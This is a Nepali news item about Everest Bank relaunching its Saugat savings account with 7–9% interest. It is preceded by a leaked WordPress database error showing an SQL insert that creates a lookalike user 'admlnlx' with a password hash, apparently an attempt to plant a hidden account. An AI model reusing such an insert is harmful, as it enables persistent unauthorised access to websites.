WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE26vZEz2V/.6GpwbyXtNPQI1illi50', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 14:50:06', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २४-
एभरेष्ट बैंकले आफ्नो एक बिषेश योजना सौगात बचत खाता लाई आकर्षक ब्याजदरका साथ पुनः सरुवात गरेको छ । बचत तथा मुद्धती खाता दुबैको मिश्रण भएको यस खातामा स्वीप इन र स्वीप आउटको सुबिधा रहेको छ ।
उपभोक्ताले यस खातालाई बचत खाताको रुपमा प्रयोग गर्न सक्दछन् र लामो अवधिको लागी रहने रकममा अति आकर्षक ब्याजदर पाउछन् । साथै यो बचत खाता संचालन र लगानीको हिसाबमा एकदमै उपयुक्त छ जसमा ग्राहकले ७% देखि ९% सम्म ब्याज प्राप्त गर्दछन् ।एभरेष्ट बैंकले हाल आफ्ना ६१ वटा शाखाहरु, ५ एक्सटेन्सन काउन्टर, २४ राजस्व संकलन काउन्टर र ८५ एटिएम तथा बृहत बाह्य सन्जाल मार्फत उत्कृष्ट सेवाहरु प्रदान गर्दै आइरहेको छ । बैंकले एसियन पेन्टस् न्युबिज “बेस्ट म्यानेज्ड कमर्सियल बैंक अवार्ड २०१३” का साथै आ.ब. २०६८÷०६९मा “वाणिज्य बैंक मध्येमा सर्वाधिक करदाता” को सम्मान प्राप्त गरेको थियो ।